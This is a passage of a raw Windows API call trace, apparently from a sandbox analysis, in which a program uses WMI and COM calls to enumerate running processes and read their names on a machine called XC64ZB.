[5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.528] IUnknown:Release (This=0x671cbc) returned 0x3 [0264.528] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.530] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.530] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.530] IUnknown:Release (This=0x671cb8) returned 0x2 [0264.530] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.530] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.530] IUnknown:QueryInterface (in: This=0x671cb8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x671cb8) returned 0x0 [0264.530] IUnknown:AddRef (This=0x671cb8) returned 0x4 [0264.530] IUnknown:Release (This=0x671cb8) returned 0x3 [0264.530] IUnknown:Release (This=0x671cb8) returned 0x2 [0264.530] CoTaskMemFree (pv=0x54ba2c8) [0264.530] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.530] IUnknown:AddRef (This=0x671cb8) returned 0x3 [0264.530] IWbemClassObject:Get (in: This=0x671cb8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.530] IWbemClassObject:Get (in: This=0x671cb8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1396\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.531] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1396\"") returned 0x5e [0264.531] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1396\"") returned 0x5e [0264.531] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.531] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.531] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.531] IUnknown:Release (This=0x601a94) returned 0x1 [0264.532] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.532] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5515298) returned 0x0 [0264.532] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5515298) returned 0x0 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.532] WbemDefPath:IUnknown:AddRef (This=0x5515298) returned 0x3 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.532] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550ebd8) returned 0x0 [0264.532] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550ebd8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.533] WbemDefPath:IUnknown:Release (This=0x550ebd8) returned 0x3 [0264.533] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.533] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.533] WbemDefPath:IUnknown:Release (This=0x5515298) returned 0x2 [0264.533] WbemDefPath:IUnknown:Release (This=0x5515298) returned 0x1 [0264.533] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.533] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.533] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515298, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515298) returned 0x0 [0264.533] WbemDefPath:IUnknown:AddRef (This=0x5515298) returned 0x3 [0264.533] WbemDefPath:IUnknown:Release (This=0x5515298) returned 0x2 [0264.533] WbemDefPath:IWbemPath:SetText (This=0x5515298, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1396\"") returned 0x0 [0264.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.533] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.533] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.533] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.533] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.533] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.582] IWbemClassObject:Get (in: This=0x671cb8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cc3c8*=0, plFlavor=0x23cc3cc*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="listen_art.exe", varVal2=0x0), pType=0x23cc3c8*=8, plFlavor=0x23cc3cc*=0) returned 0x0 [0264.582] SysStringByteLen (bstr="listen_art.exe") returned 0x1c [0264.582] SysStringByteLen (bstr="listen_art.exe") returned 0x1c [0264.582] IWbemClassObject:Get (in: This=0x671cb8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23cc3c8*=8, plFlavor=0x23cc3cc*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="listen_art.exe", varVal2=0x0), pType=0x23cc3c8*=8, plFlavor=0x23cc3cc*=0) returned 0x0 [0264.582] SysStringByteLen (bstr="listen_art.exe") returned 0x1c [0264.582] SysStringByteLen (bstr="listen_art.exe") returned 0x1c [0264.582] CoTaskMemAlloc (cb=0x4) returned 0x54ba2c8 [0264.582] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2c8*=0x671e50, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x671e50) returned 0x0 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.586] IUnknown:AddRef (This=0x671e50) returned 0x3 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.586] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x671e54) returned 0x0 [0264.586] IMarshal:GetUnmarshalClass (in: This=0x671e54, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.586] IUnknown:Release (This=0x671e54) returned 0x3 [0264.586] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.586] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.587] IUnknown:QueryInterface (in: This=0x671e50, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.587] IUnknown:Release (This=0x671e50) returned 0x2 [0264.587] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.587] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.587] IUnknown:QueryInterface (in: This=0x671e50, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x671e50) returned 0x0 [0264.587] IUnknown:AddRef (This=0x671e50) returned 0x4 [0264.587] IUnknown:Release (This=0x671e50) returned 0x3 [0264.587] IUnknown:Release (This=0x671e50) returned 0x2 [0264.587] CoTaskMemFree (pv=0x54ba2c8) [0264.587] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.587] IUnknown:AddRef (This=0x671e50) returned 0x3 [0264.587] IWbemClassObject:Get (in: This=0x671e50, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.587] IWbemClassObject:Get (in: This=0x671e50, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2472\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.587] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2472\"") returned 0x5e [0264.587] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2472\"") returned 0x5e [0264.587] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.588] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.588] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.588] IUnknown:Release (This=0x601a94) returned 0x1 [0264.588] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0264.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.589] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514f18) returned 0x0 [0264.589] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0264.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514f18) returned 0x0 [0264.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.590] WbemDefPath:IUnknown:AddRef (This=0x5514f18) returned 0x3 [0264.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x550ee18) returned 0x0 [0264.590] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x550ee18, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.590] WbemDefPath:IUnknown:Release (This=0x550ee18) returned 0x3 [0264.590] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.590] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.590] WbemDefPath:IUnknown:Release (This=0x5514f18) returned 0x2 [0264.590] WbemDefPath:IUnknown:Release (This=0x5514f18) returned 0x1 [0264.590] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.590] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514f18, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514f18) returned 0x0 [0264.591] WbemDefPath:IUnknown:AddRef (This=0x5514f18) returned 0x3 [0264.591] WbemDefPath:IUnknown:Release (This=0x5514f18) returned 0x2 [0264.591] WbemDefPath:IWbemPath:SetText (This=0x5514f18, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"2472\"") returned 0x0 [0264.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.591] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.591] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.591] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.591] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.591] IWbemClassObject:Get (in: This=0x671e50, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ccc64*=0, plFlavor=0x23ccc68*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="animallikely.exe", varVal2=0x0), pType=0x23ccc64*=8, plFlavor=0x23ccc68*=0) returned 0x0 [0264.591] SysStringByteLen (bstr="animallikely.exe") returned 0x20 [0264.591] SysStringByteLen (bstr="animallikely.exe") returned 0x20 [0264.591] IWbemClassObject:Get (in: This=0x671e50, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23ccc64*=8, plFlavor=0x23ccc68*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="animallikely.exe", varVal2=0x0), pType=0x23ccc64*=8, plFlavor=0x23ccc68*=0) returned 0x0 [0264.591] SysStringByteLen (bstr="animallikely.exe") returned 0x20 [0264.591] SysStringByteLen (bstr="animallikely.exe") returned 0x20 [0264.591] CoTaskMemAlloc (cb=0x4) returned 0x54ba1c8 [0264.591] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba1c8, puReturned=0x23c1fd0 | out: apObjects=0x54ba1c8*=0x5518f68, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.593] IUnknown:QueryInterface (in: This=0x5518f68, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, 